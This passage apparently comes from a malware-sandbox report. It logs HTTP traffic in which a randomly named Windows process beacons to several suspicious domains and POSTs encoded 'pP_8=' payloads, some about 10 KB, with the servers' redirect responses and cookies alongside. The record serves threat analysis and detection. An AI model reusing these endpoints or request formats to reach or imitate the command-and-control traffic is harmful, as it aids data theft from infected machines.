45 69 52 79 35 7a 58 74 6c 79 41 52 36 37 31 43 37 52 67 50 70 6d 46 55 2b 78 4c 70 33 74 63 69 4a 71 [TRUNCATED]
                                                       Data Ascii: pP_8=[TRUNCATED]


                                                       Session ID: 24 | Source IP: 192.168.2.4 | Source Port: 63340 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 3496 | Process: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                       Timestamp: Sep 11, 2024 11:18:56.482244968 CEST | Bytes transferred: 506 | Direction: OUT
                                                       Data: GET /68ac/?V0Qh=4pBta8&pP_8=UdQRT8UlMLNCwpgj6kWQKKLq7pbVYmfVdUpnkoxSG75WqbyVgEBEWfcixBuHZAqOTbF9B+kCTwT7w8BXHK8l9WrkSPCW1YJ7B21iYQxfbqK0tW+zUb3ShNU= HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Host: www.useanecdotenow.tech
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                       Timestamp: Sep 11, 2024 11:18:56.954099894 CEST | Bytes transferred: 392 | Direction: IN
                                                       Data: HTTP/1.1 200 OK
                                                      Server: openresty
                                                      Date: Wed, 11 Sep 2024 09:18:56 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 252
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 56 30 51 68 3d 34 70 42 74 61 38 26 70 50 5f 38 3d 55 64 51 52 54 38 55 6c 4d 4c 4e 43 77 70 67 6a 36 6b 57 51 4b 4b 4c 71 37 70 62 56 59 6d 66 56 64 55 70 6e 6b 6f 78 53 47 37 35 57 71 62 79 56 67 45 42 45 57 66 63 69 78 42 75 48 5a 41 71 4f 54 62 46 39 42 2b 6b 43 54 77 54 37 77 38 42 58 48 4b 38 6c 39 57 72 6b 53 50 43 57 31 59 4a 37 42 32 31 69 59 51 78 66 62 71 4b 30 74 57 2b 7a 55 62 33 53 68 4e 55 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?V0Qh=4pBta8&pP_8=UdQRT8UlMLNCwpgj6kWQKKLq7pbVYmfVdUpnkoxSG75WqbyVgEBEWfcixBuHZAqOTbF9B+kCTwT7w8BXHK8l9WrkSPCW1YJ7B21iYQxfbqK0tW+zUb3ShNU="}</script></head></html>


                                                       Session ID: 25 | Source IP: 192.168.2.4 | Source Port: 63341 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 3496 | Process: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                       Timestamp: Sep 11, 2024 11:19:02.006359100 CEST | Bytes transferred: 784 | Direction: OUT
                                                       Data: POST /kt2f/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.asiapartnars.online
                                                      Origin: http://www.asiapartnars.online
                                                      Content-Length: 201
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.asiapartnars.online/kt2f/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 36 6f 67 78 63 6c 52 71 43 74 78 53 33 42 6d 39 69 4d 2b 62 67 30 34 4a 63 4f 6f 76 6e 6a 54 44 50 35 6c 48 2b 66 77 48 55 52 68 67 38 55 4e 31 42 67 6e 6c 49 52 79 6e 66 4b 42 65 50 52 4b 49 38 32 62 4a 77 33 31 36 65 67 5a 67 7a 63 49 53 6f 65 51 44 5a 35 33 36 2b 35 66 30 51 73 68 32 4d 76 67 4f 75 41 30 4e 78 57 44 32 58 69 2f 59 70 79 49 30 34 32 71 54 31 37 2b 31 33 6a 4c 7a 33 31 49 46 53 4d 51 70 53 4b 51 37 6f 62 53 61 49 4a 42 56 36 67 48 52 2b 58 34 31 44 56 63 38 65 69 6d 63 70 4f 48 51 6f 55 57 6e 68 32 66 70 6a 69 57 50 41 4a 4b 77 6e 41 6f 34 55 63 32 6b 4f 67 3d 3d
                                                      Data Ascii: pP_8=6ogxclRqCtxS3Bm9iM+bg04JcOovnjTDP5lH+fwHURhg8UN1BgnlIRynfKBePRKI82bJw316egZgzcISoeQDZ536+5f0Qsh2MvgOuA0NxWD2Xi/YpyI042qT17+13jLz31IFSMQpSKQ7obSaIJBV6gHR+X41DVc8eimcpOHQoUWnh2fpjiWPAJKwnAo4Uc2kOg==


                                                       Session ID: 26 | Source IP: 192.168.2.4 | Source Port: 63342 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 3496 | Process: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                       Timestamp: Sep 11, 2024 11:19:04.567523956 CEST | Bytes transferred: 804 | Direction: OUT
                                                       Data: POST /kt2f/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.asiapartnars.online
                                                      Origin: http://www.asiapartnars.online
                                                      Content-Length: 221
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.asiapartnars.online/kt2f/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 36 6f 67 78 63 6c 52 71 43 74 78 53 6c 78 57 39 68 76 6d 62 78 6b 34 4b 53 75 6f 76 79 54 54 48 50 35 5a 48 2b 65 30 74 56 6a 31 67 2f 31 39 31 41 69 50 6c 45 78 79 6e 55 71 42 66 52 68 4b 58 38 32 6e 33 77 32 4a 36 65 67 4e 67 7a 65 51 53 6f 70 45 63 59 70 33 38 78 5a 65 79 65 4d 68 32 4d 76 67 4f 75 41 78 6f 78 56 7a 32 4c 43 50 59 72 51 67 37 32 57 71 51 32 37 2b 31 39 44 4c 33 33 31 4a 6f 53 4f 6b 58 53 50 4d 37 6f 66 57 61 5a 34 42 57 6a 51 48 58 36 58 35 69 4c 57 42 6d 57 79 6e 66 6f 4d 47 72 69 58 6d 65 6b 77 4f 7a 79 54 33 59 53 4a 75 44 36 48 68 4d 5a 66 4c 74 56 67 37 63 4d 71 2f 58 46 6b 62 4a 31 54 4b 76 39 75 6e 52 36 62 6f 3d
                                                      Data Ascii: pP_8=6ogxclRqCtxSlxW9hvmbxk4KSuovyTTHP5ZH+e0tVj1g/191AiPlExynUqBfRhKX82n3w2J6egNgzeQSopEcYp38xZeyeMh2MvgOuAxoxVz2LCPYrQg72WqQ27+19DL331JoSOkXSPM7ofWaZ4BWjQHX6X5iLWBmWynfoMGriXmekwOzyT3YSJuD6HhMZfLtVg7cMq/XFkbJ1TKv9unR6bo=


                                                       Session ID: 27 | Source IP: 192.168.2.4 | Source Port: 63343 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 3496 | Process: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                       Timestamp: Sep 11, 2024 11:19:07.115612030 CEST | Bytes transferred: 10886 | Direction: OUT
                                                       Data: POST /kt2f/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.asiapartnars.online
                                                      Origin: http://www.asiapartnars.online
                                                      Content-Length: 10301
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.asiapartnars.online/kt2f/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 36 6f 67 78 63 6c 52 71 43 74 78 53 6c 78 57 39 68 76 6d 62 78 6b 34 4b 53 75 6f 76 79 54 54 48 50 35 5a 48 2b 65 30 74 56 6a 74 67 38 48 31 31 42 45 48 6c 46 78 79 6e 5a 4b 42 61 52 68 4c 4c 38 32 50 37 77 32 45 50 65 6b 39 67 79 2f 77 53 75 62 38 63 54 70 33 38 70 70 66 31 51 73 67 75 4d 72 46 4a 75 44 5a 6f 78 56 7a 32 4c 41 58 59 39 53 49 37 6d 6d 71 54 31 37 2f 36 33 6a 4c 50 33 30 74 57 53 4e 4a 69 54 37 41 37 70 2f 47 61 4b 71 35 57 38 67 48 56 39 58 35 71 4c 57 4d 34 57 79 72 31 6f 4e 6a 6a 69 51 57 65 6d 6c 76 62 67 43 61 4f 4f 49 53 61 6e 31 5a 59 55 4e 76 71 4f 33 7a 7a 63 59 4c 6c 51 48 4c 6c 76 68 37 56 6f 75 50 6d 70 65 62 38 54 2b 2b 50 70 66 41 36 5a 46 70 4e 6c 74 55 42 62 32 41 74 2f 65 4b 35 47 34 5a 37 61 37 42 42 6d 70 75 55 45 6a 72 45 65 67 30 6a 49 32 67 74 34 43 31 4d 49 74 5a 31 7a 39 57 7a 31 33 7a 65 34 6d 31 76 67 6a 34 78 63 6e 51 2b 74 53 30 6b 36 48 45 66 4c 31 58 7a 6f 42 49 4f 44 62 52 79 79 70 69 55 49 6f 41 30 6a 59 31 2b 49 38 5a 42 41 43 57 69 34 [TRUNCATED]
                                                       Data Ascii: pP_8=[TRUNCATED]


                                                       Session ID: 28 | Source IP: 192.168.2.4 | Source Port: 63344 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 3496 | Process: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                       Timestamp: Sep 11, 2024 11:19:09.657597065 CEST | Bytes transferred: 506 | Direction: OUT
                                                       Data: GET /kt2f/?pP_8=3qIRfQl/AKdo1myUuOHVh1YjbZAZzTLYZ4NmxJouZDst8nFYGFmfJjzqUfk6VEmL81v5o0lFZhte5+gDx+sfFJzn9v28G/J2fr9BwA1qwWv9b12erCAk53Y=&V0Qh=4pBta8 HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Host: www.asiapartnars.online
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                       Timestamp: Sep 11, 2024 11:19:10.107368946 CEST | Bytes transferred: 392 | Direction: IN
                                                       Data: HTTP/1.1 200 OK
                                                      Server: openresty
                                                      Date: Wed, 11 Sep 2024 09:19:10 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 252
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 70 50 5f 38 3d 33 71 49 52 66 51 6c 2f 41 4b 64 6f 31 6d 79 55 75 4f 48 56 68 31 59 6a 62 5a 41 5a 7a 54 4c 59 5a 34 4e 6d 78 4a 6f 75 5a 44 73 74 38 6e 46 59 47 46 6d 66 4a 6a 7a 71 55 66 6b 36 56 45 6d 4c 38 31 76 35 6f 30 6c 46 5a 68 74 65 35 2b 67 44 78 2b 73 66 46 4a 7a 6e 39 76 32 38 47 2f 4a 32 66 72 39 42 77 41 31 71 77 57 76 39 62 31 32 65 72 43 41 6b 35 33 59 3d 26 56 30 51 68 3d 34 70 42 74 61 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?pP_8=3qIRfQl/AKdo1myUuOHVh1YjbZAZzTLYZ4NmxJouZDst8nFYGFmfJjzqUfk6VEmL81v5o0lFZhte5+gDx+sfFJzn9v28G/J2fr9BwA1qwWv9b12erCAk53Y=&V0Qh=4pBta8"}</script></head></html>


                                                       Session ID: 29 | Source IP: 192.168.2.4 | Source Port: 63345 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 3496 | Process: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                       Timestamp: Sep 11, 2024 11:19:15.172907114 CEST | Bytes transferred: 769 | Direction: OUT
                                                       Data: POST /al6z/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.linkwave.cloud
                                                      Origin: http://www.linkwave.cloud
                                                      Content-Length: 201
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.linkwave.cloud/al6z/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 59 54 71 74 69 44 6f 6f 77 42 63 70 4d 33 56 70 65 76 4d 74 50 77 44 53 55 74 71 36 66 74 79 52 55 35 5a 54 33 78 31 50 44 4f 54 67 59 6a 62 59 65 2b 57 66 41 7a 58 33 56 50 56 79 4e 57 65 55 78 59 44 66 47 37 4c 77 7a 42 45 6c 61 61 2f 33 76 35 57 66 72 2b 67 42 62 63 54 31 4e 52 75 31 32 62 4a 57 6b 63 6e 33 46 47 51 70 77 64 79 67 67 6d 6e 75 6e 76 33 48 47 53 68 48 4b 32 77 49 67 49 5a 34 67 68 6b 55 52 57 4f 37 37 71 34 70 77 33 41 6b 4a 4c 66 33 71 61 42 36 34 6e 36 74 46 41 6f 71 4d 2f 52 39 47 35 6a 33 59 78 56 57 66 74 76 6b 37 63 70 56 76 58 53 38 39 37 69 2b 4b 77 3d 3d
                                                      Data Ascii: pP_8=YTqtiDoowBcpM3VpevMtPwDSUtq6ftyRU5ZT3x1PDOTgYjbYe+WfAzX3VPVyNWeUxYDfG7LwzBElaa/3v5Wfr+gBbcT1NRu12bJWkcn3FGQpwdyggmnunv3HGShHK2wIgIZ4ghkURWO77q4pw3AkJLf3qaB64n6tFAoqM/R9G5j3YxVWftvk7cpVvXS897i+Kw==


                                                       Session ID: 30 | Source IP: 192.168.2.4 | Source Port: 63346 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 3496 | Process: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                       Timestamp: Sep 11, 2024 11:19:17.723570108 CEST | Bytes transferred: 789 | Direction: OUT
                                                       Data: POST /al6z/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.linkwave.cloud
                                                      Origin: http://www.linkwave.cloud
                                                      Content-Length: 221
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.linkwave.cloud/al6z/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 59 54 71 74 69 44 6f 6f 77 42 63 70 4d 57 6c 70 63 4d 30 74 65 41 44 54 58 74 71 36 52 4e 79 56 55 35 46 54 33 77 42 68 44 38 33 67 59 47 2f 59 52 63 75 66 44 7a 58 33 41 2f 56 33 54 6d 65 62 78 59 66 39 47 36 6e 77 7a 42 67 6c 61 65 7a 33 6f 49 57 63 74 2b 67 50 64 63 54 33 4a 52 75 31 32 62 4a 57 6b 59 32 51 46 47 49 70 77 73 43 67 68 45 50 74 37 2f 33 41 53 43 68 48 62 6d 77 4d 67 49 59 62 67 6c 6c 63 52 55 32 37 37 71 49 70 77 6d 41 6e 41 4c 66 78 6c 36 41 30 78 6d 72 37 4e 6a 46 79 42 75 70 7a 48 35 6e 31 55 58 45 4d 4f 63 4f 7a 70 63 4e 6d 79 51 62 49 77 34 66 33 52 79 48 69 69 77 6e 4e 76 32 4e 57 4f 45 77 5a 36 36 4a 44 53 37 77 3d
                                                      Data Ascii: pP_8=YTqtiDoowBcpMWlpcM0teADTXtq6RNyVU5FT3wBhD83gYG/YRcufDzX3A/V3TmebxYf9G6nwzBglaez3oIWct+gPdcT3JRu12bJWkY2QFGIpwsCghEPt7/3ASChHbmwMgIYbgllcRU277qIpwmAnALfxl6A0xmr7NjFyBupzH5n1UXEMOcOzpcNmyQbIw4f3RyHiiwnNv2NWOEwZ66JDS7w=


                                                       Session ID: 31 | Source IP: 192.168.2.4 | Source Port: 63347 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 3496 | Process: C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                       Timestamp: Sep 11, 2024 11:19:20.268410921 CEST | Bytes transferred: 10871 | Direction: OUT
                                                       Data: POST /al6z/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.linkwave.cloud
                                                      Origin: http://www.linkwave.cloud
                                                      Content-Length: 10301
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.linkwave.cloud/al6z/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 59 54 71 74 69 44 6f 6f 77 42 63 70 4d 57 6c 70 63 4d 30 74 65 41 44 54 58 74 71 36 52 4e 79 56 55 35 46 54 33 77 42 68 44 38 2f 67 59 77 7a 59 51 37 36 66 43 7a 58 33 63 76 56 32 54 6d 65 38 78 59 58 35 47 36 36 4e 7a 44 49 6c 61 37 76 33 70 36 75 63 34 4f 67 50 66 63 54 30 4e 52 75 61 32 59 68 53 6b 63 53 51 46 47 49 70 77 76 71 67 6b 6d 6e 74 35 2f 33 48 47 53 68 31 4b 32 77 6b 67 49 42 67 67 6c 68 4d 51 6c 57 37 37 4b 59 70 7a 55 59 6e 63 62 66 7a 78 61 42 70 78 6d 6d 6c 4e 69 70 2b 42 75 4d 59 48 37 37 31 46 44 42 4b 4b 34 2b 49 2f 4b 46 66 70 58 7a 59 37 49 36 30 66 55 6e 4c 69 68 7a 59 34 6c 46 66 4d 45 6f 63 2f 6f 30 49 47 75 6e 72 6b 53 75 4a 61 6d 59 70 30 6b 30 71 53 67 4c 6e 47 70 48 71 4b 5a 73 55 74 63 4a 7a 78 4c 38 59 30 32 31 73 69 31 4c 47 43 41 66 6f 56 6b 78 7a 65 42 49 67 74 59 58 78 57 44 41 42 62 69 4c 64 31 52 33 58 52 69 70 50 73 32 2b 30 55 71 70 36 68 6f 42 62 64 31 31 6d 6f 32 66 74 61 46 37 70 42 6a 56 6e 69 66 49 4f 64 63 6a 49 66 57 62 49 54 4c 4a 4e 75 [TRUNCATED]
                                                       Data Ascii: pP_8=[TRUNCATED]


                                                       Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                       32          192.168.2.4  63348        3.33.130.190    80                3496  C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                       Timestamp                             Bytes transferred  Direction  Data
                                                       Sep 11, 2024 11:19:22.816143036 CEST  501                OUT        GET /al6z/?pP_8=VRCNh0NW0GgzXjJ9PdlWfXWwdPKpBv6LK6gi/31OI/HLVz3edLOFPgfBWIIFI1yv4KnHdZ/ByCAdRrOw29Cps8gpdM+xYTm/p50f5dz2MVQM3pqegGrg4cw=&V0Qh=4pBta8 HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Host: www.linkwave.cloud
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                       Sep 11, 2024 11:19:23.490638018 CEST  392                IN         HTTP/1.1 200 OK
                                                      Server: openresty
                                                      Date: Wed, 11 Sep 2024 09:19:23 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 252
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 70 50 5f 38 3d 56 52 43 4e 68 30 4e 57 30 47 67 7a 58 6a 4a 39 50 64 6c 57 66 58 57 77 64 50 4b 70 42 76 36 4c 4b 36 67 69 2f 33 31 4f 49 2f 48 4c 56 7a 33 65 64 4c 4f 46 50 67 66 42 57 49 49 46 49 31 79 76 34 4b 6e 48 64 5a 2f 42 79 43 41 64 52 72 4f 77 32 39 43 70 73 38 67 70 64 4d 2b 78 59 54 6d 2f 70 35 30 66 35 64 7a 32 4d 56 51 4d 33 70 71 65 67 47 72 67 34 63 77 3d 26 56 30 51 68 3d 34 70 42 74 61 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?pP_8=VRCNh0NW0GgzXjJ9PdlWfXWwdPKpBv6LK6gi/31OI/HLVz3edLOFPgfBWIIFI1yv4KnHdZ/ByCAdRrOw29Cps8gpdM+xYTm/p50f5dz2MVQM3pqegGrg4cw=&V0Qh=4pBta8"}</script></head></html>


                                                       Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                       33          192.168.2.4  63349        85.153.138.113  80                3496  C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                       Timestamp                             Bytes transferred  Direction  Data
                                                       Sep 11, 2024 11:19:28.740500927 CEST  763                OUT        POST /3lu7/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.mfgarage.net
                                                      Origin: http://www.mfgarage.net
                                                      Content-Length: 201
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.mfgarage.net/3lu7/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 71 78 2b 49 63 70 55 41 39 6a 30 70 74 6e 67 58 65 67 70 41 34 64 79 48 31 67 48 31 72 36 56 36 45 4a 50 55 67 71 51 71 34 6c 41 58 66 66 51 62 30 4e 45 54 69 59 53 52 51 79 48 31 34 69 4e 34 4a 70 45 49 78 4f 65 53 6f 75 51 59 6e 35 48 6e 4e 69 46 62 52 49 61 72 65 46 46 73 56 6e 67 4c 32 58 50 46 56 72 6e 47 59 43 51 7a 58 68 63 6b 56 32 77 35 66 46 35 65 4f 58 2b 2f 64 39 36 67 68 36 41 4a 4e 32 4d 68 44 6c 33 70 58 67 4f 76 54 58 70 79 58 2f 46 61 65 52 37 64 44 62 6c 63 64 6c 69 31 36 6a 63 4d 59 72 6a 38 69 57 54 75 58 42 79 41 54 7a 46 59 4b 64 79 78 6c 41 43 6d 42 67 3d 3d
                                                      Data Ascii: pP_8=qx+IcpUA9j0ptngXegpA4dyH1gH1r6V6EJPUgqQq4lAXffQb0NETiYSRQyH14iN4JpEIxOeSouQYn5HnNiFbRIareFFsVngL2XPFVrnGYCQzXhckV2w5fF5eOX+/d96gh6AJN2MhDl3pXgOvTXpyX/FaeR7dDblcdli16jcMYrj8iWTuXByATzFYKdyxlACmBg==
                                                       Sep 11, 2024 11:19:29.857608080 CEST  1236               IN         HTTP/1.1 302 Found
                                                      x-content-type-options: nosniff
                                                      x-frame-options: SAMEORIGIN
                                                      content-security-policy: frame-ancestors 'self' https://*.sahibinden.com
                                                      pragma: no-cache
                                                      expires: 0
                                                      cache-control: no-cache, no-store, must-revalidate
                                                      set-cookie: vid=7; Domain=.sahibinden.com; Expires=Sat, 11-Sep-2027 09:19:29 GMT; Path=/; Secure; SameSite=None
                                                      set-cookie: cdid=QDILqjVcXFmEXOnl66e160a1; Domain=.sahibinden.com; Expires=Sat, 11-Sep-2027 09:19:29 GMT; Path=/; Secure; SameSite=None
                                                      set-cookie: csss=Z54BQt4A_PQ9yIeu9HlI5qtEAUQqILYJqfxD0LMR38Xp3Uiuz9RmfyuzXf4V719veaGR-SqUX8Z5sttsN5frzQ; Domain=.sahibinden.com; Expires=Wed, 11-Sep-2024 09:49:29 GMT; Path=/; Secure; SameSite=None
                                                      set-cookie: csls=igcCZUOV_dj1TGeFk3x26bEeocV_uFTw_KcDcRKv3yeigNFoNbGIHI_0uhtXNnVBGQ-0LV2cFh3jtjQp2RJOHA; Domain=.sahibinden.com; Expires=Thu, 11-Sep-2025 09:19:29 GMT; Path=/; Secure; SameSite=None
                                                      set-cookie: csid=jZdFKFIBuVsFizCwbWtwddbgRfQkCudIJb8K_knhX-dx54Y1L8deSPIr56tXbVKLzm2mJnrmoe4xEl0qn0ycCyK6D5PXhvwWRNe_oAyQBXUqMdavZE2CnXaiUB-xMTf4nX70JFvfO1mvZm6HgxN_RAUiF_HoG5aJUdSzb-SuPd25RVyrTk6qVoENDIWyqsvurUQCVomAnGPOJfhCa5yREQ6p8ePxZeufiQQnBlhQI7neGjthC4YQUKS_XpHC6IcvugkypoDrBj7CAP0owzqXn8id3AxZEkmXJIWKQ1GTsJnfd26x5PsP_WgEUJtvM6BHj_ZLAnWSmDXJ
                                                      Data Raw:
                                                      Data Ascii:
                                                       Sep 11, 2024 11:19:29.857626915 CEST  404                IN         Data Raw: 6b 2d 71 53 65 44 6c 48 66 2d 75 61 6a 73 64 42 6b 38 33 78 75 78 7a 65 42 56 6b 44 66 74 59 7a 7a 53 63 65 7a 32 4e 57 44 32 64 6b 53 4b 4d 68 39 69 65 3b 20 44 6f 6d 61 69 6e 3d 2e 73 61 68 69 62 69 6e 64 65 6e 2e 63 6f 6d 3b 20 45 78 70 69 72
